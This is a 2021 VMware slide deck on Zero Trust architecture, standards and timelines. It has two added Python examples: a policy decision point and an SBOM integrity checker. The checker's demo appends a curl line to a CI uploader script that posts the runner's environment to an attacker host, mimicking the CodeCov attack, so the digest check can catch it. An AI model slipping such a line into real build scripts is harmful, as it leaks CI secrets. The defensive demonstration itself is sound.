
Zero Trust

The Concept, Standards, Requirements,


Timeline, Directions

Dennis Moreau,
Sr Engineering Architect, Cybersecurity
VMware, Research and Innovation, Office of the CTO
©2020 VMware, Inc. 9/24/2021
Agenda

What is Zero Trust and how does it work (to address supply chain security, ransomware and complexity)?

Where are the standards now?
• NIST ZT Reference Architecture
• DoD ZT Reference Architecture
• NIST Guidance on ZT for Microservices and Service Mesh
• NCCoE Collaboration on ZT
• The ZT Timeline

Guidance
• NIST NCCoE Audit Guidance
• CISA Maturity Model
• CISA Cloud Security Reference Architecture
• Timeline (EO-14028, CMMC, EU NIS2, …)
• UK NCSC ZT Architecture Guidelines
• EU NIS2 ZT (ENISA) – Parliament vote in November
ZT Assumption of Compromise == Supply Chain Attack

Colonial Pipeline Ransomware & Exfiltration Attack (DoubleDip)
• 5000 mile pipeline, 100s of remote valves, 200 Mft³, $5M ransom, $$$ business impact…
• 400,000 pipeline miles potentially vulnerable. $$$$ threat is orders of magnitude larger in just pipeline control, availability, safety
• $$$$$ remediation – redesign, replacement, OpEx++, Reg, …

SunBurst (Solorigate) Supply Chain Attack
• Undetected for 15 months (despite 18K security portfolios & teams)
• Injected into the DevOps cycle, global sourcing (Bulgaria), inadequate curation/testing/isolation …
• Triggering standards, regulatory and procurement response (see WH EO)

CodeCov Supply Chain Attack – what was exposed:
• Any credentials, tokens, or keys passed to the Continuous Integration runner
• Any services, data stores, and application code that could be accessed with these credentials, tokens, or keys
• 19,000 customers including IBM, HP, Atlassian, Rapid7 … who are also participants in supply chains… downstream damage still being investigated.
Long Undetected Compromises: a Prelude to Much Ransomware

Supply Chain [1]
– Attacks up by 42% in Q1 of 2021 – data compromise only increased by 12%
– Q1 SC attacks: 27 vendors, 140 organizations publicly reported as targets, 7.4 M impacted
– Number of affected individuals up by 560%
– Trend is to compromise multiple organizations through one point of attack
– Huge spike in insurance claims due to service outages (MS Exchange attack, 30,000-60,000 orgs) – legal, forensic, cleanup, disruption and fines

Increasingly combined with data extortion (ransomware) [2]
– 228 Industrials and Engineering
– 225 Manufacturing
– 145 Technology
– 142 Retail
– 95 Healthcare

Pressure is on governments to "Do Something"!

Enter the EO for Improving the Nation's Cybersecurity, NIST, CISA, NSA and the DoD…

Sources: (1) CrowdStrike 2021 Global Threat Report; (2) Identity Theft Resource Center 2021
Zero Trust is a very different policy approach …

Continuous, granular policy enforcement and containment … via compartmentalization (by application/service).

ZT requires that we assume compromise … so:
ZT assumes compromise in the supply chain and in the perimeter; therefore compartmentalization is necessary.

But complete compartmentalization is not very useful … so:
ZT applies compartment-specific policy, continuously, at policy enforcement points (PEPs):

• Least Privilege – requires knowing all "subjects"
• Least Functionality – requires knowing all "objects"
• Least Accessibility (crypto) – requires knowing access needs
• Least Exposure (posture) – requires assessing device, service and platform integrity … developer due care, curation, testing
• Coherence (peer, temporal) – requires knowing intended, expected and observed behavior


ZT Implies Many Continuous Enforcement Points … and Their Alerts

ZT requires classification by association to business impact: Risk = Prob * Impact.

Business Risk is decomposed into Categorized Function, Categorized Service and Categorized Component (Comp Criticality <= Categorized Comp). Each categorized component sits behind its own PEP, so a ZT deployment has many PEPs, each of which generates alerts.


ZT Concept Space

ZT Policy := (Subjects, Objects, Risk)

• Risk: Business Risk, Categorized Function, Categorized Service, Categorized Data; Comp Criticality <= Categorized Comp
• Trust anchors: App Trust Anchor, User Trust Anchor, Platform Trust Anchor
• ZT Ref Arch: PEPs, decoupling business policy from technology
• ZT Capable Platform (Policy Enablement): Topology, Isolation, Enforcement
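The slides define ZT policy as the tuple (Subjects, Objects, Risk) with Risk = Prob * Impact, enforced continuously at PEPs under least privilege and least exposure (posture). The block below is an added example written for this page, not code from the deck, VMware, NIST or OPA: a minimal policy decision point in Python that evaluates one request against that tuple, denies by default, and is re-run on every posture change during a session. Every identity, role, posture flag, criticality tier, probability weight and risk budget in it is a constructed illustration, not a value from any standard.

```python
"""Added example for this deck (not VMware, NIST or OPA code): a minimal
policy decision point that evaluates one request as the tuple
(Subject, Object, Risk) the slides use, with Risk = Prob * Impact.
Roles, posture flags, criticality tiers, probability weights and risk
budgets are all constructed illustrations, not values from any standard."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Subject:
    id: str
    roles: List[str]
    auth_strength: int               # assumed scale: 0 none, 1 password, 2 MFA/phishing-resistant
    device_posture: Dict[str, bool]  # e.g. {"disk_encrypted": True, "edr_healthy": False}


@dataclass
class Resource:
    id: str
    criticality: int                 # assumed business-impact tier, 1 (low) .. 5 (mission critical)
    allowed_roles: List[str]         # least privilege: explicit entitlements only
    required_posture: List[str]      # least exposure: posture the object demands of the device


@dataclass
class Decision:
    allow: bool
    reasons: List[str]
    risk: float


# Constructed: maximum acceptable Prob * Impact per criticality tier.
RISK_BUDGET = {1: 1.0, 2: 0.8, 3: 0.6, 4: 0.3, 5: 0.15}


def compromise_probability(s: Subject) -> float:
    """Crude per-request estimate of P(subject or device compromised).
    Constructed weights: weak authentication and each failed posture
    check raise the estimate; a real PDP would feed EDR/UEBA scores here."""
    p = 0.05
    if s.auth_strength < 2:
        p += 0.25
    p += 0.15 * sum(1 for ok in s.device_posture.values() if not ok)
    return min(p, 1.0)


def evaluate(s: Subject, r: Resource, action: str) -> Decision:
    """One policy decision for one (subject, object, action). Default deny:
    the request is allowed only if every check below has nothing to say."""
    reasons: List[str] = []
    # Identity of every subject is established before anything else is considered.
    if s.auth_strength == 0:
        return Decision(False, ["unauthenticated subject"], 1.0)
    # Least privilege: the role must be explicitly entitled to this object.
    if not set(s.roles) & set(r.allowed_roles):
        reasons.append(f"role not entitled to {r.id}")
    # Least exposure: the device must satisfy the posture the object requires.
    missing = [p for p in r.required_posture if not s.device_posture.get(p, False)]
    if missing:
        reasons.append("posture failed: " + ",".join(missing))
    # Risk = Prob * Impact, compared with the budget of the object's criticality tier.
    impact = r.criticality / 5.0
    risk = compromise_probability(s) * impact
    if risk > RISK_BUDGET[r.criticality]:
        reasons.append(f"risk {risk:.2f} exceeds budget {RISK_BUDGET[r.criticality]}")
    # Step-up: writes to the most critical objects need phishing-resistant auth.
    if action == "write" and r.criticality >= 4 and s.auth_strength < 2:
        reasons.append("step-up authentication required for write")
    return Decision(not reasons, reasons or ["allow"], risk)


def continuous_session(s: Subject, r: Resource, action: str,
                       posture_events: List[Tuple[str, bool]]) -> List[Decision]:
    """Continuous enforcement: re-run the decision on every posture change
    during a session. The PEP acts on the first deny (drops the session)."""
    decisions = [evaluate(s, r, action)]
    for key, ok in posture_events:
        s.device_posture[key] = ok
        decisions.append(evaluate(s, r, action))
    return decisions


if __name__ == "__main__":
    alice = Subject("alice", ["finance"], 2,
                    {"disk_encrypted": True, "edr_healthy": True, "patched": True})
    ledger = Resource("gl-ledger", 4, ["finance"], ["disk_encrypted", "edr_healthy"])
    for d in continuous_session(alice, ledger, "read", [("edr_healthy", False)]):
        print(d.allow, d.reasons, round(d.risk, 2))
```

The point the code makes that the slide cannot: the decision is a function of the object's business criticality, not of a CVSS score, and a session that was allowed a moment ago is denied as soon as the device's posture changes, which is what "continuous" means at a PEP. In a real deployment the same logic would be expressed as Rego for OPA and the posture feed would come from EDR/MDM telemetry rather than a dictionary.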


ZT as of Q2 2021 – The Definitions that Matter

• DISA and NSA, Department of Defense (DOD) Zero Trust Reference Architecture Version 1.0
• NIST, SP 800-207, Zero Trust Architecture
• NSA, Embracing a Zero Trust Security Model


Zero Trust – Why it matters? – The Mandate
https://www.federalregister.gov/documents/2021/05/17/2021-10460/improving-the-nations-cybersecurity#:~:text=Executive%20Order%2014028%20of%20May%2012%2C%202021%20Improving,it%20is%20hereby%20ordered%20as%20follows%3A%20Section%201.


What is Zero Trust?


High-Level ZT Implementation Architecture
What does ZTA look like … by definition.

ZT Architecture
• Required ZT Solution Telemetry
• ZT Policy Statements (e.g. OPA, …): aligned on the same Subject, Object and associated Transactional Risk (Business risk, not CVSS risk)
• Continuous Inline ZT Enforcement: logically adjacent to Resources; authoritative controls and independent verification

Subjects (Page 7)
• Users, Roles
• Service Accounts
• Identity Records (Rep)
• …

Assets (Page 8)
• Servers, Desktops
• Laptops, Tablets, Phones
• Mobile & IoT Devices

Resources (Page 7) (Objects)
• Applications
• Services
• Micro-services/Containers (NSA)
• (on Prem, Hosted, Cloud and Edge)
ZTA Implies Layering (end to end)

Risk Aware ZT Policy / Enterprise Business aware ZT Policy (e.g. OPA + YAML + RiskMap)
• Criticality Impact aware – real Risk
• Aligned from User to Enterprise Application
• Entitlement and Anomaly Informed
• (Subject, Object, Criticality/Importance)

Layers, each with an Aligned ZT Conformant Policy over (Subject, Object, Criticality/Importance), e.g. OPA + YAML + Stacklet:
• User/Device/App – Aligned ZT Conformant Policy (EU)
• Session/Host/Hosted Service – Aligned ZT Conformant Policy (GW)
• ID/Container/Application-Micro-service, SM – Aligned ZT Conformant Policy (SM)
NSA Caveat on Partial ZTA Implementations (limited ZT protection)
When adding fractional ZT makes policy management less effective (NSA). Also see EO 14028 Sec. 10(k).

Enterprise Business aware ZT Policy
• Criticality Impact aware – real Risk
• Aligned from User to Enterprise Application
• Entitlement and Anomaly Informed

Conventional Policy Structure (Non-ZT), across User/Device/App, Session/Host/Hosted Service and ID/Container/Application-Micro-service:
• Non-ZT elements remain, typically mis-aligned between User/Device/App and Session/Host/Hosted Service, giving a false sense of ZT
• Mis-configured Intention (guard rails – Config, Roles, Classification) and Observation (verification – EDR, ML)
• Traditional scattered security architecture (Policy aligned on VPN, VLAN, Perimeter, …)

https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF
CISA ZT Maturity Model (DRAFT - PC Opened 9/2021)
https://www.cisa.gov/sites/default/files/publications/CISA%20Zero%20Trust%20Maturity%20Model_Draft.pdf



Important Observations from CISA ZT MM Document
[Page ii]
• The path to zero trust is an incremental process that will take years to implement.
• Legacy infrastructure and systems may not support a zero trust implementation.

[Page 2] Zero trust presents a shift from a location-centric model to a more data-centric approach for fine-grained
security controls between users, systems, data and assets that change over time; for these reasons, moving to a ZTA is
non-trivial. This provides the visibility needed to support the development, implementation, enforcement, and evolution
of security policies. More fundamentally, zero trust may require a change in an organization’s philosophy and culture
around cybersecurity. The path to zero trust is a journey that will take years to implement.

[Page 3] 6. Challenge The Federal Government faces several challenges in transitioning to ZTA. First, legacy systems rely
on “implicit trust”; this concept conflicts with the core principle of adaptive evaluation of trust within a ZTA. Additionally,
existing infrastructures are also built on implicit trust and must either be rebuilt or replaced. To rebuild or replace
information technology (IT) infrastructure and mission systems requires a significant investment on the part of agencies.
Lastly, there is no consensus on or formal adoption of a maturity model for ZTA. While proposals for maturity models
have been put forth, current initiatives for kickstarting zero trust adoption are often focused on the network layer and do
not present a holistic approach for transition



CISA MM Transitioning to ZT [Page 4]
https://www.cisa.gov/sites/default/files/publications/CISA%20Zero%20Trust%20Maturity%20Model_Draft.pdf

Transitioning to Zero Trust:


1. Identify Actors on the Enterprise.
2. Identify Assets Owned by the Enterprise.
3. Identify Key Processes and Evaluate Risks Associated with Executing Process.
• The Basis for Business Impact (Risk)

4. Formulating Policies for the ZTA Candidate.


5. Identifying Candidate Solutions.
6. Initial Deployment and Monitoring



OMB Updates: M-Series Memos

OMB owns policy and contract language.

• Federal Zero Trust Strategy – Moving the U.S. Government Towards Zero Trust Cybersecurity Principles (draft for public comment, 2021-09-07) –
https://zerotrust.cyber.gov/downloads/Office%20of%20Management%20and%20Budget%20-%20Federal%20Zero%20Trust%20Strategy%20-%20DRAFT%20For%20Public%20Comment%20-%202021-09-07.pdf


Where are we now?



What does ZT look like over existing technology?
DoD ZT Reference Architecture: https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf


What does ZT look like employing existing technology?
DoD ZT Reference Architecture: https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf

ZT elements mapped onto existing technology:
• Device Posture
• ZT Policy Expression: PEP policy deployment; Subjects, Objects
• Continuous Risk Evaluation
• Container Granularity Containment/Isolation
• Intentional Classification of Sensitivity
• App, Subject and Object Trust Anchors


Application Trust Anchor based on “shifted left” security context

https://www.nist.gov/system/files/documents/2021/07/13/Developer%20Verification%20of%20Software.pdf


ZT Applies to Operation of "Critical Software"
… not just how you build secure stuff.

Zero Trust is cited in 10 separate audit controls for the compliant and certifiable operation of "Critical Software". ZT is not just a product capability for customers; it is also the kind of policy that is expected to constrain the customer's operation of our platform.

https://www.nist.gov/system/files/documents/2021/07/09/Critical%20Software%20Use%20Security%20Measures%20Guidance.pdf


Enter NIST NCCoE
https://www.nccoe.nist.gov/projects/building-blocks/zero-trust-architecture


NCCoE Names 18 Firms for Zero Trust Collaboration Project | NCCoE (nist.gov)
Friday, July 23, 2021

The National Institute of Standards and Technology's (NIST) National Cybersecurity Center of Excellence (NCCoE) has named 18 firms it will work with on NCCoE's Implementing a Zero Trust Architecture Project.
The 18 companies – all of whom answered a public call for collaborators and entered a related cooperative research and development agreement with NCCoE – will work with the organization to demonstrate approaches to implementing zero trust architectures designed and deployed according to the concepts and tenets in NIST's Special Publication (SP) 800-207 on Zero Trust Architecture.

The goal of the project is to produce a publicly available NIST Cybersecurity Practice Guide that shows the practical steps to implement the cybersecurity reference designs.
Natalia Martin, NCCoE's acting director, said the center received "an overwhelming response from the vendor community on this important project."

"Implementing a zero trust architecture has become a Federal cybersecurity mandate and a business imperative," she said. "We are excited to work with industry demonstrating various approaches to implementing a zero trust architecture using a diverse mix of vendor products and capabilities, and share how-to guidance and lessons learned from the experience."

The 18 firms are: Amazon Web Services, Inc.; Appgate; Cisco Systems, Inc.; F5 Networks, Inc.; FireEye, Inc.; Forescout Technologies, Inc.; International Business Machines Corporation (IBM); McAfee Corp.; Microsoft Corporation; MobileIron, Inc. an Ivanti Company; Okta, Inc.; Palo Alto Networks; PC Matic, Inc.; Radiant Logic, Inc.; SailPoint Technologies, Inc.; Symantec, a Division of Broadcom; Tenable, Inc.; and Zscaler, Inc.

"Zero trust is a team sport and the NIST NCCoE is taking the initiative to bring together best-of-breed zero trust leaders," commented Stephen Kovac, Vice President of Global Government and Head of Corporate Compliance at Zscaler.

"We are all committed to collaborating and demonstrating different, practical approaches to implement a zero trust architecture," he said. "As we know, no one solution fits every situation. Zscaler is honored to be a part of this coalition working side by side to realize the opportunity for zero trust to strengthen every agency's cyber defenses."
"Cisco is happy to be a National Center of Excellence Partner (NCEP) of NCCoE since the beginning and are proud to continue contributing to their SP 1800 documents," said Peter Romness, Cybersecurity Principal, U.S. Public Sector CTO Office, at Cisco. "These publications are used by governments and businesses around the world as guides to implement their own cybersecurity capabilities."
"Zero Trust is a hot topic and our customers are looking for guidance from an impartial, trusted source like NIST," he said. "Their SP 800-207 – Zero Trust Architecture, is already being used to understand zero trust. This new project will show examples of how to implement zero trust. We're thrilled we were selected to help."


NCCoE Evaluation Comparative Scenarios (Pages 5-6)
May be phased due to market balkanization of policy across segments and telemetries.

Scenario 1: Employee Access to Corporate Resources. An employee is looking for easy and secure access to corporate resources, from any work location.

Scenario 2: Employee Access to Internet Resources. An employee is trying to access the public internet to accomplish some tasks.

Scenario 3: Contractor Access to Corporate and Internet Resources. A contractor is trying to access certain corporate resources and the internet.

Scenario 4: Inter-server Communication Within the Enterprise. Corporate services often have different servers communicating with each other. For example, a web server communicates with an application server.

Scenario 5: Cross-Enterprise Collaboration with Business Partners. In this scenario, the ZTA solution implemented in this project will enable users from one enterprise to securely access specific resources from the other enterprise, and vice versa.

Scenario 6: Develop Trust Score/Confidence Level with Corporate Resources. In this scenario, a ZTA solution will integrate monitoring and SIEM systems with the policy engine to produce a more precise calculation of trust scores/confidence levels in near real time.

https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-final.pdf


CISA Cloud Security Ref Arch (DRAFT - PC Opened 9/2021)
https://www.cisa.gov/sites/default/files/publications/CISA%20Cloud%20Security%20Technical%20Reference%20Architecture_Version%201.pdf

CISA CSRA Refers to Zero Trust 38 times:


“…
As agencies continue to use cloud technology, they shall do so in a coordinated, deliberate way
that allows the Federal Government to prevent, detect, assess, and remediate cyber incidents. To
facilitate this approach, the migration to cloud technology shall adopt zero trust architecture, as
practicable. The CISA shall modernize its current cybersecurity programs, services, and
capabilities to be fully functional with cloud-computing environments with zero trust
architecture. The Secretary of Homeland Security acting through the Director of CISA, in
consultation with the Administrator of General Services acting through the FedRAMP within the
General Services Administration, shall develop security principles governing Cloud Service
Providers (CSPs) for incorporation into agency modernization efforts. To facilitate this work:
[…]
Within 90 days of the date of this order, the Secretary of Homeland Security acting through the
Director of CISA, in consultation with the Director of OMB and the Administrator of General
Services acting through FedRAMP, shall develop and issue, for the Federal Civilian Executive
Branch (FCEB), cloud-security technical reference architecture documentation that
illustrates recommended approaches to cloud migration and data protection for agency
data collection and reporting.
…”



ZT Leverages DevSecOps
The Platform Role: Governance (Zero Trust + Supply Chain + Dev…)

The slide is a lifecycle diagram of which only the labels survive extraction. It shows a governance loop over Development, Deploy and Operation: Risk Appetite and a RiskMap/CJA feed Risk Assessment against Bus/Mission Objectives (Policy, Criticality, Classification, Investment; Performance, Compliance, Incident, Impact), and the stages Assess, Classify, Monitor, Analyze, Triage, Respond, Mitigate and Optimize are applied to Application/Service Artifacts and to Platform ID, Dependency and Metadata.

Artifacts and telemetry named on the slide: Intended Behavior, Passive and Active Test Results, Observed Ops Behavior in Test, SWID tags, OpenAPI, CI/CD Logs, SCAP/InSpec assessments; at operation, Observation Alerts, Signatures, Ops Context, Diagnostic Forensics, Anomalies, Behaviors, Indicators, Severities, Recommendations, Mitigation Efficacy, Resource Demand, Ops Anomaly; instance actions Isolate, Monitor, Instantiate, Failover, Scale, Recover; log formats LEEF, CIM, CADF, ARF.

Standards and frameworks referenced: NIST SP 800-207 (Zero Trust), SP 800-161/161A (supply chain), SP 800-171/171A (CUI), SP 800-172/172A (CUI Enhanced), SSDF, OSCAL, CRMF, SCAPv2, InSpec, STIX, STIX Shifter, CyBOX, Kestrel, D3FEND, ATT&CK, Threat Intel; reference architecture notations C4, DoDAF, SABSA, OpenDXL.
NIST and the EO 14028 (Where ZT is headed)
https://www.nist.gov/itl/executive-order-improving-nations-cybersecurity



Scope + Timeline

EO-14028 Timeline (Adolus)
• https://info.adolus.com/eo14028-timeline
• Demonstrates progressive refinement of requirements as they emanate from NIST, CISA, OMB, and FAR changes.


Zero Trust - UK
NCSC Zero Trust Architecture –
https://www.ncsc.gov.uk/collection/zero-trust-architecture
https://www.ncsc.gov.uk/section/ncsc-for-startups/overview
https://www.ncsc.gov.uk/blog-post/zero-trust-1-0

UK NCSC ZT Architecture Principles
1. Know your architecture, including users, devices, services and data.
2. Know your user, service and device identities.
3. Assess your user behaviour, device and service health.
4. Use policies to authorise requests.
5. Authenticate and authorise everywhere.
6. Focus your monitoring on users, devices and services.
7. Don't trust any network, including your own.
8. Choose services designed for zero trust.
EU NIS2 and ZT – Parliament Vote now in November



Look Familiar??
EU Supply Chain & DevSecOps & Incident/Vuln Reporting
https://www.europarl.europa.eu/RegData/etudes/BRIE/2021/689333/EPRS_BRI(2021)689333_EN.pdf
https://www.europarl.europa.eu/RegData/etudes/STUD/2021/653637/EXPO_STU(2021)653637_EN.pdf

Technical:
• Enforcement of strong Authentication and
Access Controls
• Establishes CVE and related standards &
coordination agreements to other CVE-based
registries
• Establishes top level DNS mandate
• Zero Trust – Priority 7 - ENISA



ZT Guidance
• NIST NCCoE ZTA Security Measures/Controls
• CISA Maturity Model
• CISA Cloud security Reference Architecture
• NIST and the EO Timeline (pacing of additional ZT
standards and guidance)



NCCoE ZTA Security Control Map: Comparison and Audit of ZTAs
What's "Good Enough"? Pages 11-14

• +SBOM
• Multiple telemetry/sensor types collected and correlated (separation of Network, Endpoint, Service … telemetry/analytics is not the intent)
• Known Payload Identity Required
• Known Vulnerability Identity Required
• LP + LF (Least Privilege + Least Functionality)
• No single point of policy enforcement
• Granular Isolation – NSA: container level at least

https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-final.pdf
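Two of the control-map items, known payload identity and known vulnerability identity, plus the SBOM the map adds, are mechanical checks a platform can run before admitting an artifact, and they are the check that would have caught the CodeCov pattern from the earlier slide (a CI uploader script silently changed after build). The block below is an added example written for this page, not code from the deck, NIST or NCCoE: it generates a minimal CycloneDX-shaped SBOM from constructed build artifacts, verifies delivered artifacts against the attested SHA-256 digests, matches component purls against a constructed advisory feed, and returns a default-deny admission decision. The artifact bytes, the advisory identifier and the tampered script are all constructed; no real CVE is implied.

```python
"""Added example (not code from the deck, NIST or NCCoE): the 'known payload
identity' and 'known vulnerability identity' checks from the control map,
run over an SBOM before an artifact is admitted to a ZT-governed platform.
Artifacts, SBOM digests and the advisory feed are constructed inline and
the advisory identifier is fictitious; no real CVE is implied."""
import hashlib
from typing import Dict, List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed artifacts exactly as the build produced them (what the SBOM attests).
BUILT: Dict[str, bytes] = {
    "pkg:pypi/libfoo@1.2.3": b"libfoo 1.2.3 wheel (constructed bytes)",
    "pkg:pypi/libbar@1.9.0": b"libbar 1.9.0 wheel (constructed bytes)",
    "pkg:generic/ci-uploader@4.1.0": b"#!/bin/sh\ncurl -sS https://example.invalid/upload -T report.xml\n",
}

# Minimal CycloneDX-shaped SBOM generated from BUILT (constructed).
SBOM = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"purl": purl, "hashes": [{"alg": "SHA-256", "content": sha256_hex(blob)}]}
        for purl, blob in BUILT.items()
    ],
}

# Constructed advisory feed standing in for NVD/OSV; the identifier is fictitious.
ADVISORIES = [
    {"id": "EXAMPLE-ADV-1", "purl_base": "pkg:pypi/libbar", "fixed_in": "2.0.0"},
]


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))


def split_purl(purl: str) -> Tuple[str, str]:
    base, _, version = purl.rpartition("@")
    return base, version


def verify_payloads(sbom: dict, delivered: Dict[str, bytes]) -> List[str]:
    """Known payload identity: every delivered artifact must match the digest the
    SBOM attests, every attested component must be present, and nothing may
    arrive that the SBOM does not declare."""
    findings: List[str] = []
    declared = {c["purl"] for c in sbom["components"]}
    for c in sbom["components"]:
        expected = next(h["content"] for h in c["hashes"] if h["alg"] == "SHA-256")
        blob = delivered.get(c["purl"])
        if blob is None:
            findings.append(f"missing artifact {c['purl']}")
        elif sha256_hex(blob) != expected:
            findings.append(f"digest mismatch for {c['purl']}")
    findings += [f"undeclared artifact {p}" for p in delivered if p not in declared]
    return findings


def match_vulnerabilities(sbom: dict, advisories: List[dict]) -> List[str]:
    """Known vulnerability identity: components below an advisory's fixed
    version are reported by purl, so the finding names the exact instance."""
    findings: List[str] = []
    for c in sbom["components"]:
        base, version = split_purl(c["purl"])
        for adv in advisories:
            if adv["purl_base"] == base and parse_version(version) < parse_version(adv["fixed_in"]):
                findings.append(f"{adv['id']} affects {c['purl']} (fixed in {adv['fixed_in']})")
    return findings


def admit(sbom: dict, delivered: Dict[str, bytes], advisories: List[dict]) -> Tuple[bool, List[str]]:
    """Admission decision for the PEP in front of the platform: default deny
    unless both identity checks come back clean."""
    findings = verify_payloads(sbom, delivered) + match_vulnerabilities(sbom, advisories)
    return (not findings, findings)


if __name__ == "__main__":
    # Constructed tampering of the CI uploader script, the pattern of the CodeCov
    # incident on the earlier slide: the script is changed to exfiltrate the runner's env.
    tampered = dict(BUILT)
    tampered["pkg:generic/ci-uploader@4.1.0"] += b'curl -sS https://attacker.invalid -d "$(env)"\n'
    ok, findings = admit(SBOM, tampered, ADVISORIES)
    print("admit:", ok)
    for f in findings:
        print(" -", f)
```

The digest check is what makes the SBOM more than an inventory: without it the document says what was meant to ship, not what arrived. A production version would verify a signature over the SBOM itself (the digest list is only as trustworthy as its producer), use a proper purl and version-range library rather than the dotted-integer comparison here, and tie the admission result to the component's criticality tier so that a finding on a mission-critical component blocks while one on a low-tier component only alerts.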
ZT Direction: ZT in Audit
200,000 Auditors : One ZT Definition



ZT Audit Prep - Global

CACS Global Auditor Guidance





Zero Trust Extension
Implementing Zero Trust
Zero Trust – driving out implicit trust and reducing policy misconfiguration
§ Assume compromise of … endpoint, host, supply chain, app, account, integrity -> continuous independent verification on granular isolation
§ Establish the identity of all subjects and continuously verify
§ Assure confidentiality, integrity and availability of all objects and continuously verify
§ Classify all interactions according to business risk
§ ZT Reference Architectures enable
§ logical colocation of intentional and observational controls
§ on boundaries logically close to the resources (objects) to be protected and the subjects to be controlled
§ https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf
§ https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-final.pdf
– ZT Multi-Cloud: https://www.nist.gov/news-events/events/2021/01/devsecops-and-zero-trust-architecture-zta-multi-cloud-environments
– ZT Service Mesh: https://csrc.nist.gov/publications/detail/sp/800-204b/draft


Recap

What is Zero Trust and how does it work (to address supply chain security, ransomware and complexity)?

Where are the standards now?
• NIST ZT Reference Architecture
• DoD ZT Reference Architecture
• NIST Guidance on ZT for Microservices and Service Mesh
• NCCoE Collaboration on ZT
• The ZT Timeline

Guidance
• NIST NCCoE Audit Guidance
• CISA Maturity Model
• CISA Cloud Security Reference Architecture
• Timeline (EO-14028, CMMC, EU NIS2, …)
• UK NCSC ZT Architecture Guidelines
• EU NIS2 ZT (ENISA) – Parliament vote in November


Thank You
Feedback, Questions, Followups and Collaboration
[email protected]



Appendix of Relevant Sources for ZTA Technical Requirements
From NIST bibliography on ZTA

• NIST Cybersecurity Framework v1.1, Framework for Improving Critical Infrastructure Cybersecurity – https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
• NIST SP 800-30 Revision 1, Guide for Conducting Risk Assessments – https://doi.org/10.6028/NIST.SP.800-30r1
• NIST SP 800-37 Revision 2, Risk Management Framework for Information Systems and Organizations: A System Life Cycle Approach for Security and Privacy – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-37r2.pdf
• NIST SP 800-40 Revision 3, Guide to Enterprise Patch Management Technologies – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
• NIST SP 800-46 Revision 2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf
• NIST SP 800-53 Revision 4, Security and Privacy Controls for Federal Information Systems and Organizations – https://csrc.nist.gov/csrc/media/publications/sp/800-53/rev-4/archive/2013-04-30/documents/sp800-53-rev4-ipd.pdf
• NIST SP 800-57 Part 1 Revision 4, Recommendation for Key Management: Part 1: General – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57pt1r4.pdf
• NIST SP 800-61 Revision 2, Computer Security Incident Handling Guide – http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
• NIST SP 800-63 Revision 3, Digital Identity Guidelines – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf
• NIST SP 800-92, Guide to Computer Security Log Management – http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf
• NIST SP 800-114 Revision 1, User's Guide to Telework and Bring Your Own Device (BYOD) Security – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf
• NIST SP 800-122, Guide to Protecting the Confidentiality of Personally Identifiable Information (PII) – https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-122.pdf
• NIST SP 800-124 Revision 2 (Draft), Guidelines for Managing the Security of Mobile Devices in the Enterprise – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-124r2-draft.pdf
• NIST SP 800-160 Vol. 2, Developing Cyber Resilient Systems: A Systems Security Engineering Approach – https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final
• NIST SP 800-162, Guide to Attribute Based Access Control (ABAC) Definition and Considerations – https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.sp.800-162.pdf
• NIST SP 800-175B, Guideline for Using Cryptographic Standards in the Federal Government: Cryptographic Mechanisms – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175b.pdf
• NIST SP 800-171 Revision 2, Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r2.pdf
• NIST SP 800-205, Attribute Considerations for Access Control Systems – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-205.pdf
• NIST SP 800-207 (Second Draft), Zero Trust Architecture – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207-draft2.pdf
• NIST SP 1800-3, Attribute Based Access Control – https://www.nccoe.nist.gov/sites/default/files/library/sp1800/abac-nist-sp1800-3-draft-v2.pdf
• Cloud Security Alliance, Software Defined Perimeter Working Group, SDP Specification 1.0 – https://downloads.cloudsecurityalliance.org/initiatives/sdp/SDP_Specification_1.0.pdf
• ISO/IEC 27001, Information Technology – Security Techniques – Information Security Management Systems
• American Council for Technology-Industry Advisory Council, Zero Trust Cybersecurity Current Trends – https://www.actiac.org/system/files/ACTIAC%20Zero%20Trust%20Project%20Report%2004182019.pdf
• Federal Information Processing Standards 140-3, Security Requirements for Cryptographic Modules – https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf
